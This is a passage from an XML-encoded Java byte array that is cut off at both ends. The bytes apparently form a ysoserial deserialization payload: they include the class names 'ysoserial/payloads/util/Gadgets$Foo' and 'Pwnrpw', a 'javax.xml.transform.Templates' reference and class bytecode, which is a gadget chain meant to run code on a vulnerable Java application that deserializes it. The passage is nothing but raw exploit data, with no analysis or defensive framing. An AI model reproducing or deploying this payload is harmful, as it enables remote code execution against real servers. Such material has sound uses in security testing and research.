<void index="2363"><byte>1</byte></void>
<void index="2364"><byte>0</byte></void>
<void index="2365"><byte>23</byte></void>
<void index="2366"><byte>0</byte></void>
<void index="2367"><byte>24</byte></void>
<void index="2368"><byte>0</byte></void>
<void index="2369"><byte>2</byte></void>
<void index="2370"><byte>0</byte></void>
<void index="2371"><byte>25</byte></void>
<void index="2372"><byte>0</byte></void>
<void index="2373"><byte>0</byte></void>
<void index="2374"><byte>0</byte></void>
<void index="2375"><byte>4</byte></void>
<void index="2376"><byte>0</byte></void>
<void index="2377"><byte>1</byte></void>
<void index="2378"><byte>0</byte></void>
<void index="2379"><byte>26</byte></void>
<void index="2380"><byte>0</byte></void>
<void index="2381"><byte>1</byte></void>
<void index="2382"><byte>0</byte></void>
<void index="2383"><byte>19</byte></void>
<void index="2384"><byte>0</byte></void>
<void index="2385"><byte>27</byte></void>
<void index="2386"><byte>0</byte></void>
<void index="2387"><byte>2</byte></void>
<void index="2388"><byte>0</byte></void>
<void index="2389"><byte>12</byte></void>
<void index="2390"><byte>0</byte></void>
<void index="2391"><byte>0</byte></void>
<void index="2392"><byte>0</byte></void>
<void index="2393"><byte>73</byte></void>
<void index="2394"><byte>0</byte></void>
<void index="2395"><byte>0</byte></void>
<void index="2396"><byte>0</byte></void>
<void index="2397"><byte>4</byte></void>
<void index="2398"><byte>0</byte></void>
<void index="2399"><byte>0</byte></void>
<void index="2400"><byte>0</byte></void>
<void index="2401"><byte>1</byte></void>
<void index="2402"><byte>-79</byte></void>
<void index="2403"><byte>0</byte></void>
<void index="2404"><byte>0</byte></void>
<void index="2405"><byte>0</byte></void>
<void index="2406"><byte>2</byte></void>
<void index="2407"><byte>0</byte></void>
<void index="2408"><byte>13</byte></void>
<void index="2409"><byte>0</byte></void>
<void index="2410"><byte>0</byte></void>
<void index="2411"><byte>0</byte></void>
<void index="2412"><byte>6</byte></void>
<void index="2413"><byte>0</byte></void>
<void index="2414"><byte>1</byte></void>
<void index="2415"><byte>0</byte></void>
<void index="2416"><byte>0</byte></void>
<void index="2417"><byte>0</byte></void>
<void index="2418"><byte>50</byte></void>
<void index="2419"><byte>0</byte></void>
<void index="2420"><byte>14</byte></void>
<void index="2421"><byte>0</byte></void>
<void index="2422"><byte>0</byte></void>
<void index="2423"><byte>0</byte></void>
<void index="2424"><byte>42</byte></void>
<void index="2425"><byte>0</byte></void>
<void index="2426"><byte>4</byte></void>
<void index="2427"><byte>0</byte></void>
<void index="2428"><byte>0</byte></void>
<void index="2429"><byte>0</byte></void>
<void index="2430"><byte>1</byte></void>
<void index="2431"><byte>0</byte></void>
<void index="2432"><byte>15</byte></void>
<void index="2433"><byte>0</byte></void>
<void index="2434"><byte>98</byte></void>
<void index="2435"><byte>0</byte></void>
<void index="2436"><byte>0</byte></void>
<void index="2437"><byte>0</byte></void>
<void index="2438"><byte>0</byte></void>
<void index="2439"><byte>0</byte></void>
<void index="2440"><byte>1</byte></void>
<void index="2441"><byte>0</byte></void>
<void index="2442"><byte>21</byte></void>
<void index="2443"><byte>0</byte></void>
<void index="2444"><byte>22</byte></void>
<void index="2445"><byte>0</byte></void>
<void index="2446"><byte>1</byte></void>
<void index="2447"><byte>0</byte></void>
<void index="2448"><byte>0</byte></void>
<void index="2449"><byte>0</byte></void>
<void index="2450"><byte>1</byte></void>
<void index="2451"><byte>0</byte></void>
<void index="2452"><byte>28</byte></void>
<void index="2453"><byte>0</byte></void>
<void index="2454"><byte>29</byte></void>
<void index="2455"><byte>0</byte></void>
<void index="2456"><byte>2</byte></void>
<void index="2457"><byte>0</byte></void>
<void index="2458"><byte>0</byte></void>
<void index="2459"><byte>0</byte></void>
<void index="2460"><byte>1</byte></void>
<void index="2461"><byte>0</byte></void>
<void index="2462"><byte>30</byte></void>
<void index="2463"><byte>0</byte></void>
<void index="2464"><byte>31</byte></void>
<void index="2465"><byte>0</byte></void>
<void index="2466"><byte>3</byte></void>
<void index="2467"><byte>0</byte></void>
<void index="2468"><byte>25</byte></void>
<void index="2469"><byte>0</byte></void>
<void index="2470"><byte>0</byte></void>
<void index="2471"><byte>0</byte></void>
<void index="2472"><byte>4</byte></void>
<void index="2473"><byte>0</byte></void>
<void index="2474"><byte>1</byte></void>
<void index="2475"><byte>0</byte></void>
<void index="2476"><byte>26</byte></void>
<void index="2477"><byte>0</byte></void>
<void index="2478"><byte>8</byte></void>
<void index="2479"><byte>0</byte></void>
<void index="2480"><byte>41</byte></void>
<void index="2481"><byte>0</byte></void>
<void index="2482"><byte>11</byte></void>
<void index="2483"><byte>0</byte></void>
<void index="2484"><byte>1</byte></void>
<void index="2485"><byte>0</byte></void>
<void index="2486"><byte>12</byte></void>
<void index="2487"><byte>0</byte></void>
<void index="2488"><byte>0</byte></void>
<void index="2489"><byte>0</byte></void>
<void index="2490"><byte>81</byte></void>
<void index="2491"><byte>0</byte></void>
<void index="2492"><byte>6</byte></void>
<void index="2493"><byte>0</byte></void>
<void index="2494"><byte>2</byte></void>
<void index="2495"><byte>0</byte></void>
<void index="2496"><byte>0</byte></void>
<void index="2497"><byte>0</byte></void>
<void index="2498"><byte>60</byte></void>
<void index="2499"><byte>-89</byte></void>
<void index="2500"><byte>0</byte></void>
<void index="2501"><byte>3</byte></void>
<void index="2502"><byte>1</byte></void>
<void index="2503"><byte>76</byte></void>
<void index="2504"><byte>-69</byte></void>
<void index="2505"><byte>0</byte></void>
<void index="2506"><byte>43</byte></void>
<void index="2507"><byte>89</byte></void>
<void index="2508"><byte>-69</byte></void>
<void index="2509"><byte>0</byte></void>
<void index="2510"><byte>45</byte></void>
<void index="2511"><byte>89</byte></void>
<void index="2512"><byte>-73</byte></void>
<void index="2513"><byte>0</byte></void>
<void index="2514"><byte>46</byte></void>
<void index="2515"><byte>-72</byte></void>
<void index="2516"><byte>0</byte></void>
<void index="2517"><byte>52</byte></void>
<void index="2518"><byte>-74</byte></void>
<void index="2519"><byte>0</byte></void>
<void index="2520"><byte>56</byte></void>
<void index="2521"><byte>18</byte></void>
<void index="2522"><byte>58</byte></void>
<void index="2523"><byte>-74</byte></void>
<void index="2524"><byte>0</byte></void>
<void index="2525"><byte>64</byte></void>
<void index="2526"><byte>-74</byte></void>
<void index="2527"><byte>0</byte></void>
<void index="2528"><byte>70</byte></void>
<void index="2529"><byte>-74</byte></void>
<void index="2530"><byte>0</byte></void>
<void index="2531"><byte>74</byte></void>
<void index="2532"><byte>18</byte></void>
<void index="2533"><byte>76</byte></void>
<void index="2534"><byte>-74</byte></void>
<void index="2535"><byte>0</byte></void>
<void index="2536"><byte>74</byte></void>
<void index="2537"><byte>-74</byte></void>
<void index="2538"><byte>0</byte></void>
<void index="2539"><byte>79</byte></void>
<void index="2540"><byte>-73</byte></void>
<void index="2541"><byte>0</byte></void>
<void index="2542"><byte>82</byte></void>
<void index="2543"><byte>-69</byte></void>
<void index="2544"><byte>0</byte></void>
<void index="2545"><byte>84</byte></void>
<void index="2546"><byte>89</byte></void>
<void index="2547"><byte>18</byte></void>
<void index="2548"><byte>86</byte></void>
<void index="2549"><byte>-73</byte></void>
<void index="2550"><byte>0</byte></void>
<void index="2551"><byte>87</byte></void>
<void index="2552"><byte>-74</byte></void>
<void index="2553"><byte>0</byte></void>
<void index="2554"><byte>92</byte></void>
<void index="2555"><byte>-74</byte></void>
<void index="2556"><byte>0</byte></void>
<void index="2557"><byte>95</byte></void>
<void index="2558"><byte>-79</byte></void>
<void index="2559"><byte>0</byte></void>
<void index="2560"><byte>0</byte></void>
<void index="2561"><byte>0</byte></void>
<void index="2562"><byte>1</byte></void>
<void index="2563"><byte>0</byte></void>
<void index="2564"><byte>96</byte></void>
<void index="2565"><byte>0</byte></void>
<void index="2566"><byte>0</byte></void>
<void index="2567"><byte>0</byte></void>
<void index="2568"><byte>3</byte></void>
<void index="2569"><byte>0</byte></void>
<void index="2570"><byte>1</byte></void>
<void index="2571"><byte>3</byte></void>
<void index="2572"><byte>0</byte></void>
<void index="2573"><byte>2</byte></void>
<void index="2574"><byte>0</byte></void>
<void index="2575"><byte>32</byte></void>
<void index="2576"><byte>0</byte></void>
<void index="2577"><byte>0</byte></void>
<void index="2578"><byte>0</byte></void>
<void index="2579"><byte>2</byte></void>
<void index="2580"><byte>0</byte></void>
<void index="2581"><byte>33</byte></void>
<void index="2582"><byte>0</byte></void>
<void index="2583"><byte>17</byte></void>
<void index="2584"><byte>0</byte></void>
<void index="2585"><byte>0</byte></void>
<void index="2586"><byte>0</byte></void>
<void index="2587"><byte>10</byte></void>
<void index="2588"><byte>0</byte></void>
<void index="2589"><byte>1</byte></void>
<void index="2590"><byte>0</byte></void>
<void index="2591"><byte>2</byte></void>
<void index="2592"><byte>0</byte></void>
<void index="2593"><byte>35</byte></void>
<void index="2594"><byte>0</byte></void>
<void index="2595"><byte>16</byte></void>
<void index="2596"><byte>0</byte></void>
<void index="2597"><byte>9</byte></void>
<void index="2598"><byte>117</byte></void>
<void index="2599"><byte>113</byte></void>
<void index="2600"><byte>0</byte></void>
<void index="2601"><byte>126</byte></void>
<void index="2602"><byte>0</byte></void>
<void index="2603"><byte>11</byte></void>
<void index="2604"><byte>0</byte></void>
<void index="2605"><byte>0</byte></void>
<void index="2606"><byte>1</byte></void>
<void index="2607"><byte>-44</byte></void>
<void index="2608"><byte>-54</byte></void>
<void index="2609"><byte>-2</byte></void>
<void index="2610"><byte>-70</byte></void>
<void index="2611"><byte>-66</byte></void>
<void index="2612"><byte>0</byte></void>
<void index="2613"><byte>0</byte></void>
<void index="2614"><byte>0</byte></void>
<void index="2615"><byte>50</byte></void>
<void index="2616"><byte>0</byte></void>
<void index="2617"><byte>27</byte></void>
<void index="2618"><byte>10</byte></void>
<void index="2619"><byte>0</byte></void>
<void index="2620"><byte>3</byte></void>
<void index="2621"><byte>0</byte></void>
<void index="2622"><byte>21</byte></void>
<void index="2623"><byte>7</byte></void>
<void index="2624"><byte>0</byte></void>
<void index="2625"><byte>23</byte></void>
<void index="2626"><byte>7</byte></void>
<void index="2627"><byte>0</byte></void>
<void index="2628"><byte>24</byte></void>
<void index="2629"><byte>7</byte></void>
<void index="2630"><byte>0</byte></void>
<void index="2631"><byte>25</byte></void>
<void index="2632"><byte>1</byte></void>
<void index="2633"><byte>0</byte></void>
<void index="2634"><byte>16</byte></void>
<void index="2635"><byte>115</byte></void>
<void index="2636"><byte>101</byte></void>
<void index="2637"><byte>114</byte></void>
<void index="2638"><byte>105</byte></void>
<void index="2639"><byte>97</byte></void>
<void index="2640"><byte>108</byte></void>
<void index="2641"><byte>86</byte></void>
<void index="2642"><byte>101</byte></void>
<void index="2643"><byte>114</byte></void>
<void index="2644"><byte>115</byte></void>
<void index="2645"><byte>105</byte></void>
<void index="2646"><byte>111</byte></void>
<void index="2647"><byte>110</byte></void>
<void index="2648"><byte>85</byte></void>
<void index="2649"><byte>73</byte></void>
<void index="2650"><byte>68</byte></void>
<void index="2651"><byte>1</byte></void>
<void index="2652"><byte>0</byte></void>
<void index="2653"><byte>1</byte></void>
<void index="2654"><byte>74</byte></void>
<void index="2655"><byte>1</byte></void>
<void index="2656"><byte>0</byte></void>
<void index="2657"><byte>13</byte></void>
<void index="2658"><byte>67</byte></void>
<void index="2659"><byte>111</byte></void>
<void index="2660"><byte>110</byte></void>
<void index="2661"><byte>115</byte></void>
<void index="2662"><byte>116</byte></void>
<void index="2663"><byte>97</byte></void>
<void index="2664"><byte>110</byte></void>
<void index="2665"><byte>116</byte></void>
<void index="2666"><byte>86</byte></void>
<void index="2667"><byte>97</byte></void>
<void index="2668"><byte>108</byte></void>
<void index="2669"><byte>117</byte></void>
<void index="2670"><byte>101</byte></void>
<void index="2671"><byte>5</byte></void>
<void index="2672"><byte>113</byte></void>
<void index="2673"><byte>-26</byte></void>
<void index="2674"><byte>105</byte></void>
<void index="2675"><byte>-18</byte></void>
<void index="2676"><byte>60</byte></void>
<void index="2677"><byte>109</byte></void>
<void index="2678"><byte>71</byte></void>
<void index="2679"><byte>24</byte></void>
<void index="2680"><byte>1</byte></void>
<void index="2681"><byte>0</byte></void>
<void index="2682"><byte>6</byte></void>
<void index="2683"><byte>60</byte></void>
<void index="2684"><byte>105</byte></void>
<void index="2685"><byte>110</byte></void>
<void index="2686"><byte>105</byte></void>
<void index="2687"><byte>116</byte></void>
<void index="2688"><byte>62</byte></void>
<void index="2689"><byte>1</byte></void>
<void index="2690"><byte>0</byte></void>
<void index="2691"><byte>3</byte></void>
<void index="2692"><byte>40</byte></void>
<void index="2693"><byte>41</byte></void>
<void index="2694"><byte>86</byte></void>
<void index="2695"><byte>1</byte></void>
<void index="2696"><byte>0</byte></void>
<void index="2697"><byte>4</byte></void>
<void index="2698"><byte>67</byte></void>
<void index="2699"><byte>111</byte></void>
<void index="2700"><byte>100</byte></void>
<void index="2701"><byte>101</byte></void>
<void index="2702"><byte>1</byte></void>
<void index="2703"><byte>0</byte></void>
<void index="2704"><byte>15</byte></void>
<void index="2705"><byte>76</byte></void>
<void index="2706"><byte>105</byte></void>
<void index="2707"><byte>110</byte></void>
<void index="2708"><byte>101</byte></void>
<void index="2709"><byte>78</byte></void>
<void index="2710"><byte>117</byte></void>
<void index="2711"><byte>109</byte></void>
<void index="2712"><byte>98</byte></void>
<void index="2713"><byte>101</byte></void>
<void index="2714"><byte>114</byte></void>
<void index="2715"><byte>84</byte></void>
<void index="2716"><byte>97</byte></void>
<void index="2717"><byte>98</byte></void>
<void index="2718"><byte>108</byte></void>
<void index="2719"><byte>101</byte></void>
<void index="2720"><byte>1</byte></void>
<void index="2721"><byte>0</byte></void>
<void index="2722"><byte>18</byte></void>
<void index="2723"><byte>76</byte></void>
<void index="2724"><byte>111</byte></void>
<void index="2725"><byte>99</byte></void>
<void index="2726"><byte>97</byte></void>
<void index="2727"><byte>108</byte></void>
<void index="2728"><byte>86</byte></void>
<void index="2729"><byte>97</byte></void>
<void index="2730"><byte>114</byte></void>
<void index="2731"><byte>105</byte></void>
<void index="2732"><byte>97</byte></void>
<void index="2733"><byte>98</byte></void>
<void index="2734"><byte>108</byte></void>
<void index="2735"><byte>101</byte></void>
<void index="2736"><byte>84</byte></void>
<void index="2737"><byte>97</byte></void>
<void index="2738"><byte>98</byte></void>
<void index="2739"><byte>108</byte></void>
<void index="2740"><byte>101</byte></void>
<void index="2741"><byte>1</byte></void>
<void index="2742"><byte>0</byte></void>
<void index="2743"><byte>4</byte></void>
<void index="2744"><byte>116</byte></void>
<void index="2745"><byte>104</byte></void>
<void index="2746"><byte>105</byte></void>
<void index="2747"><byte>115</byte></void>
<void index="2748"><byte>1</byte></void>
<void index="2749"><byte>0</byte></void>
<void index="2750"><byte>3</byte></void>
<void index="2751"><byte>70</byte></void>
<void index="2752"><byte>111</byte></void>
<void index="2753"><byte>111</byte></void>
<void index="2754"><byte>1</byte></void>
<void index="2755"><byte>0</byte></void>
<void index="2756"><byte>12</byte></void>
<void index="2757"><byte>73</byte></void>
<void index="2758"><byte>110</byte></void>
<void index="2759"><byte>110</byte></void>
<void index="2760"><byte>101</byte></void>
<void index="2761"><byte>114</byte></void>
<void index="2762"><byte>67</byte></void>
<void index="2763"><byte>108</byte></void>
<void index="2764"><byte>97</byte></void>
<void index="2765"><byte>115</byte></void>
<void index="2766"><byte>115</byte></void>
<void index="2767"><byte>101</byte></void>
<void index="2768"><byte>115</byte></void>
<void index="2769"><byte>1</byte></void>
<void index="2770"><byte>0</byte></void>
<void index="2771"><byte>37</byte></void>
<void index="2772"><byte>76</byte></void>
<void index="2773"><byte>121</byte></void>
<void index="2774"><byte>115</byte></void>
<void index="2775"><byte>111</byte></void>
<void index="2776"><byte>115</byte></void>
<void index="2777"><byte>101</byte></void>
<void index="2778"><byte>114</byte></void>
<void index="2779"><byte>105</byte></void>
<void index="2780"><byte>97</byte></void>
<void index="2781"><byte>108</byte></void>
<void index="2782"><byte>47</byte></void>
<void index="2783"><byte>112</byte></void>
<void index="2784"><byte>97</byte></void>
<void index="2785"><byte>121</byte></void>
<void index="2786"><byte>108</byte></void>
<void index="2787"><byte>111</byte></void>
<void index="2788"><byte>97</byte></void>
<void index="2789"><byte>100</byte></void>
<void index="2790"><byte>115</byte></void>
<void index="2791"><byte>47</byte></void>
<void index="2792"><byte>117</byte></void>
<void index="2793"><byte>116</byte></void>
<void index="2794"><byte>105</byte></void>
<void index="2795"><byte>108</byte></void>
<void index="2796"><byte>47</byte></void>
<void index="2797"><byte>71</byte></void>
<void index="2798"><byte>97</byte></void>
<void index="2799"><byte>100</byte></void>
<void index="2800"><byte>103</byte></void>
<void index="2801"><byte>101</byte></void>
<void index="2802"><byte>116</byte></void>
<void index="2803"><byte>115</byte></void>
<void index="2804"><byte>36</byte></void>
<void index="2805"><byte>70</byte></void>
<void index="2806"><byte>111</byte></void>
<void index="2807"><byte>111</byte></void>
<void index="2808"><byte>59</byte></void>
<void index="2809"><byte>1</byte></void>
<void index="2810"><byte>0</byte></void>
<void index="2811"><byte>10</byte></void>
<void index="2812"><byte>83</byte></void>
<void index="2813"><byte>111</byte></void>
<void index="2814"><byte>117</byte></void>
<void index="2815"><byte>114</byte></void>
<void index="2816"><byte>99</byte></void>
<void index="2817"><byte>101</byte></void>
<void index="2818"><byte>70</byte></void>
<void index="2819"><byte>105</byte></void>
<void index="2820"><byte>108</byte></void>
<void index="2821"><byte>101</byte></void>
<void index="2822"><byte>1</byte></void>
<void index="2823"><byte>0</byte></void>
<void index="2824"><byte>12</byte></void>
<void index="2825"><byte>71</byte></void>
<void index="2826"><byte>97</byte></void>
<void index="2827"><byte>100</byte></void>
<void index="2828"><byte>103</byte></void>
<void index="2829"><byte>101</byte></void>
<void index="2830"><byte>116</byte></void>
<void index="2831"><byte>115</byte></void>
<void index="2832"><byte>46</byte></void>
<void index="2833"><byte>106</byte></void>
<void index="2834"><byte>97</byte></void>
<void index="2835"><byte>118</byte></void>
<void index="2836"><byte>97</byte></void>
<void index="2837"><byte>12</byte></void>
<void index="2838"><byte>0</byte></void>
<void index="2839"><byte>10</byte></void>
<void index="2840"><byte>0</byte></void>
<void index="2841"><byte>11</byte></void>
<void index="2842"><byte>7</byte></void>
<void index="2843"><byte>0</byte></void>
<void index="2844"><byte>26</byte></void>
<void index="2845"><byte>1</byte></void>
<void index="2846"><byte>0</byte></void>
<void index="2847"><byte>35</byte></void>
<void index="2848"><byte>121</byte></void>
<void index="2849"><byte>115</byte></void>
<void index="2850"><byte>111</byte></void>
<void index="2851"><byte>115</byte></void>
<void index="2852"><byte>101</byte></void>
<void index="2853"><byte>114</byte></void>
<void index="2854"><byte>105</byte></void>
<void index="2855"><byte>97</byte></void>
<void index="2856"><byte>108</byte></void>
<void index="2857"><byte>47</byte></void>
<void index="2858"><byte>112</byte></void>
<void index="2859"><byte>97</byte></void>
<void index="2860"><byte>121</byte></void>
<void index="2861"><byte>108</byte></void>
<void index="2862"><byte>111</byte></void>
<void index="2863"><byte>97</byte></void>
<void index="2864"><byte>100</byte></void>
<void index="2865"><byte>115</byte></void>
<void index="2866"><byte>47</byte></void>
<void index="2867"><byte>117</byte></void>
<void index="2868"><byte>116</byte></void>
<void index="2869"><byte>105</byte></void>
<void index="2870"><byte>108</byte></void>
<void index="2871"><byte>47</byte></void>
<void index="2872"><byte>71</byte></void>
<void index="2873"><byte>97</byte></void>
<void index="2874"><byte>100</byte></void>
<void index="2875"><byte>103</byte></void>
<void index="2876"><byte>101</byte></void>
<void index="2877"><byte>116</byte></void>
<void index="2878"><byte>115</byte></void>
<void index="2879"><byte>36</byte></void>
<void index="2880"><byte>70</byte></void>
<void index="2881"><byte>111</byte></void>
<void index="2882"><byte>111</byte></void>
<void index="2883"><byte>1</byte></void>
<void index="2884"><byte>0</byte></void>
<void index="2885"><byte>16</byte></void>
<void index="2886"><byte>106</byte></void>
<void index="2887"><byte>97</byte></void>
<void index="2888"><byte>118</byte></void>
<void index="2889"><byte>97</byte></void>
<void index="2890"><byte>47</byte></void>
<void index="2891"><byte>108</byte></void>
<void index="2892"><byte>97</byte></void>
<void index="2893"><byte>110</byte></void>
<void index="2894"><byte>103</byte></void>
<void index="2895"><byte>47</byte></void>
<void index="2896"><byte>79</byte></void>
<void index="2897"><byte>98</byte></void>
<void index="2898"><byte>106</byte></void>
<void index="2899"><byte>101</byte></void>
<void index="2900"><byte>99</byte></void>
<void index="2901"><byte>116</byte></void>
<void index="2902"><byte>1</byte></void>
<void index="2903"><byte>0</byte></void>
<void index="2904"><byte>20</byte></void>
<void index="2905"><byte>106</byte></void>
<void index="2906"><byte>97</byte></void>
<void index="2907"><byte>118</byte></void>
<void index="2908"><byte>97</byte></void>
<void index="2909"><byte>47</byte></void>
<void index="2910"><byte>105</byte></void>
<void index="2911"><byte>111</byte></void>
<void index="2912"><byte>47</byte></void>
<void index="2913"><byte>83</byte></void>
<void index="2914"><byte>101</byte></void>
<void index="2915"><byte>114</byte></void>
<void index="2916"><byte>105</byte></void>
<void index="2917"><byte>97</byte></void>
<void index="2918"><byte>108</byte></void>
<void index="2919"><byte>105</byte></void>
<void index="2920"><byte>122</byte></void>
<void index="2921"><byte>97</byte></void>
<void index="2922"><byte>98</byte></void>
<void index="2923"><byte>108</byte></void>
<void index="2924"><byte>101</byte></void>
<void index="2925"><byte>1</byte></void>
<void index="2926"><byte>0</byte></void>
<void index="2927"><byte>31</byte></void>
<void index="2928"><byte>121</byte></void>
<void index="2929"><byte>115</byte></void>
<void index="2930"><byte>111</byte></void>
<void index="2931"><byte>115</byte></void>
<void index="2932"><byte>101</byte></void>
<void index="2933"><byte>114</byte></void>
<void index="2934"><byte>105</byte></void>
<void index="2935"><byte>97</byte></void>
<void index="2936"><byte>108</byte></void>
<void index="2937"><byte>47</byte></void>
<void index="2938"><byte>112</byte></void>
<void index="2939"><byte>97</byte></void>
<void index="2940"><byte>121</byte></void>
<void index="2941"><byte>108</byte></void>
<void index="2942"><byte>111</byte></void>
<void index="2943"><byte>97</byte></void>
<void index="2944"><byte>100</byte></void>
<void index="2945"><byte>115</byte></void>
<void index="2946"><byte>47</byte></void>
<void index="2947"><byte>117</byte></void>
<void index="2948"><byte>116</byte></void>
<void index="2949"><byte>105</byte></void>
<void index="2950"><byte>108</byte></void>
<void index="2951"><byte>47</byte></void>
<void index="2952"><byte>71</byte></void>
<void index="2953"><byte>97</byte></void>
<void index="2954"><byte>100</byte></void>
<void index="2955"><byte>103</byte></void>
<void index="2956"><byte>101</byte></void>
<void index="2957"><byte>116</byte></void>
<void index="2958"><byte>115</byte></void>
<void index="2959"><byte>0</byte></void>
<void index="2960"><byte>33</byte></void>
<void index="2961"><byte>0</byte></void>
<void index="2962"><byte>2</byte></void>
<void index="2963"><byte>0</byte></void>
<void index="2964"><byte>3</byte></void>
<void index="2965"><byte>0</byte></void>
<void index="2966"><byte>1</byte></void>
<void index="2967"><byte>0</byte></void>
<void index="2968"><byte>4</byte></void>
<void index="2969"><byte>0</byte></void>
<void index="2970"><byte>1</byte></void>
<void index="2971"><byte>0</byte></void>
<void index="2972"><byte>26</byte></void>
<void index="2973"><byte>0</byte></void>
<void index="2974"><byte>5</byte></void>
<void index="2975"><byte>0</byte></void>
<void index="2976"><byte>6</byte></void>
<void index="2977"><byte>0</byte></void>
<void index="2978"><byte>1</byte></void>
<void index="2979"><byte>0</byte></void>
<void index="2980"><byte>7</byte></void>
<void index="2981"><byte>0</byte></void>
<void index="2982"><byte>0</byte></void>
<void index="2983"><byte>0</byte></void>
<void index="2984"><byte>2</byte></void>
<void index="2985"><byte>0</byte></void>
<void index="2986"><byte>8</byte></void>
<void index="2987"><byte>0</byte></void>
<void index="2988"><byte>1</byte></void>
<void index="2989"><byte>0</byte></void>
<void index="2990"><byte>1</byte></void>
<void index="2991"><byte>0</byte></void>
<void index="2992"><byte>10</byte></void>
<void index="2993"><byte>0</byte></void>
<void index="2994"><byte>11</byte></void>
<void index="2995"><byte>0</byte></void>
<void index="2996"><byte>1</byte></void>
<void index="2997"><byte>0</byte></void>
<void index="2998"><byte>12</byte></void>
<void index="2999"><byte>0</byte></void>
<void index="3000"><byte>0</byte></void>
<void index="3001"><byte>0</byte></void>
<void index="3002"><byte>47</byte></void>
<void index="3003"><byte>0</byte></void>
<void index="3004"><byte>1</byte></void>
<void index="3005"><byte>0</byte></void>
<void index="3006"><byte>1</byte></void>
<void index="3007"><byte>0</byte></void>
<void index="3008"><byte>0</byte></void>
<void index="3009"><byte>0</byte></void>
<void index="3010"><byte>5</byte></void>
<void index="3011"><byte>42</byte></void>
<void index="3012"><byte>-73</byte></void>
<void index="3013"><byte>0</byte></void>
<void index="3014"><byte>1</byte></void>
<void index="3015"><byte>-79</byte></void>
<void index="3016"><byte>0</byte></void>
<void index="3017"><byte>0</byte></void>
<void index="3018"><byte>0</byte></void>
<void index="3019"><byte>2</byte></void>
<void index="3020"><byte>0</byte></void>
<void index="3021"><byte>13</byte></void>
<void index="3022"><byte>0</byte></void>
<void index="3023"><byte>0</byte></void>
<void index="3024"><byte>0</byte></void>
<void index="3025"><byte>6</byte></void>
<void index="3026"><byte>0</byte></void>
<void index="3027"><byte>1</byte></void>
<void index="3028"><byte>0</byte></void>
<void index="3029"><byte>0</byte></void>
<void index="3030"><byte>0</byte></void>
<void index="3031"><byte>54</byte></void>
<void index="3032"><byte>0</byte></void>
<void index="3033"><byte>14</byte></void>
<void index="3034"><byte>0</byte></void>
<void index="3035"><byte>0</byte></void>
<void index="3036"><byte>0</byte></void>
<void index="3037"><byte>12</byte></void>
<void index="3038"><byte>0</byte></void>
<void index="3039"><byte>1</byte></void>
<void index="3040"><byte>0</byte></void>
<void index="3041"><byte>0</byte></void>
<void index="3042"><byte>0</byte></void>
<void index="3043"><byte>5</byte></void>
<void index="3044"><byte>0</byte></void>
<void index="3045"><byte>15</byte></void>
<void index="3046"><byte>0</byte></void>
<void index="3047"><byte>18</byte></void>
<void index="3048"><byte>0</byte></void>
<void index="3049"><byte>0</byte></void>
<void index="3050"><byte>0</byte></void>
<void index="3051"><byte>2</byte></void>
<void index="3052"><byte>0</byte></void>
<void index="3053"><byte>19</byte></void>
<void index="3054"><byte>0</byte></void>
<void index="3055"><byte>0</byte></void>
<void index="3056"><byte>0</byte></void>
<void index="3057"><byte>2</byte></void>
<void index="3058"><byte>0</byte></void>
<void index="3059"><byte>20</byte></void>
<void index="3060"><byte>0</byte></void>
<void index="3061"><byte>17</byte></void>
<void index="3062"><byte>0</byte></void>
<void index="3063"><byte>0</byte></void>
<void index="3064"><byte>0</byte></void>
<void index="3065"><byte>10</byte></void>
<void index="3066"><byte>0</byte></void>
<void index="3067"><byte>1</byte></void>
<void index="3068"><byte>0</byte></void>
<void index="3069"><byte>2</byte></void>
<void index="3070"><byte>0</byte></void>
<void index="3071"><byte>22</byte></void>
<void index="3072"><byte>0</byte></void>
<void index="3073"><byte>16</byte></void>
<void index="3074"><byte>0</byte></void>
<void index="3075"><byte>9</byte></void>
<void index="3076"><byte>112</byte></void>
<void index="3077"><byte>116</byte></void>
<void index="3078"><byte>0</byte></void>
<void index="3079"><byte>4</byte></void>
<void index="3080"><byte>80</byte></void>
<void index="3081"><byte>119</byte></void>
<void index="3082"><byte>110</byte></void>
<void index="3083"><byte>114</byte></void>
<void index="3084"><byte>112</byte></void>
<void index="3085"><byte>119</byte></void>
<void index="3086"><byte>1</byte></void>
<void index="3087"><byte>0</byte></void>
<void index="3088"><byte>120</byte></void>
<void index="3089"><byte>115</byte></void>
<void index="3090"><byte>125</byte></void>
<void index="3091"><byte>0</byte></void>
<void index="3092"><byte>0</byte></void>
<void index="3093"><byte>0</byte></void>
<void index="3094"><byte>1</byte></void>
<void index="3095"><byte>0</byte></void>
<void index="3096"><byte>29</byte></void>
<void index="3097"><byte>106</byte></void>
<void index="3098"><byte>97</byte></void>
<void index="3099"><byte>118</byte></void>
<void index="3100"><byte>97</byte></void>
<void index="3101"><byte>120</byte></void>
<void index="3102"><byte>46</byte></void>
<void index="3103"><byte>120</byte></void>
<void index="3104"><byte>109</byte></void>
<void index="3105"><byte>108</byte></void>
<void index="3106"><byte>46</byte></void>
<void index="3107"><byte>116</byte></void>
<void index="3108"><byte>114</byte></void>
<void index="3109"><byte>97</byte></void>
<void index="3110"><byte>110</byte></void>
<void index="3111"><byte>115</byte></void>
<void index="3112"><byte>102</byte></void>
<void index="3113"><byte>111</byte></void>
<void index="3114"><byte>114</byte></void>
<void index="3115"><byte>109</byte></void>
<void index="3116"><byte>46</byte></void>
<void index="3117"><byte>84</byte></void>
<void index="3118"><byte>101</byte></void>
<void index="3119"><byte>109</byte></void>
<void index="3120"><byte>112</byte></void>
<void index="3121"><byte>108</byte></void>
<void index="3122"><byte>97</byte></void>
<void index="3123"><byte>116</byte></void>
<void index="3124"><byte>101</byte></void>
<void index="3125"><byte>115</byte></void>
<void index="3126"><byte>120</byte></void>
<void index="3127"><byte>114</byte></void>
<void index="3128"><byte>0</byte></void>
<void index="3129"><byte>23</byte></void>
<void index="3130"><byte>106</byte></void>
<void index="3131"><byte>97</byte></void>
<void index="3132"><byte>118</byte></void>
<void index="3133"><byte>97</byte></void>
<void index="3134"><byte>46</byte></void>
<void index="3135"><byte>108</byte></void>
<void index="3136"><byte>97</byte></void>
<void index="3137"><byte>110</byte></void>
<void index="3138"><byte>103</byte></void>
<void index="3139"><byte>46</byte></void>
<void index="3140"><byte>114</byte></void>
<void index="3141"><byte>101</byte></void>
<void index="3142"><byte>102</byte></void>
<void index="3143"><byte>108</byte></void>
<void index="3144"><byte>101</byte></void>
<void index="3145"><byte>99</byte></void>
<void index="3146"><byte>116</byte></void>
<void index="3147"><byte>46</byte></void>
<void index="3148"><byte>80</byte></void>
<void index="3149"><byte>114</byte></void>
<void index="3150"><byte>111</byte></void>
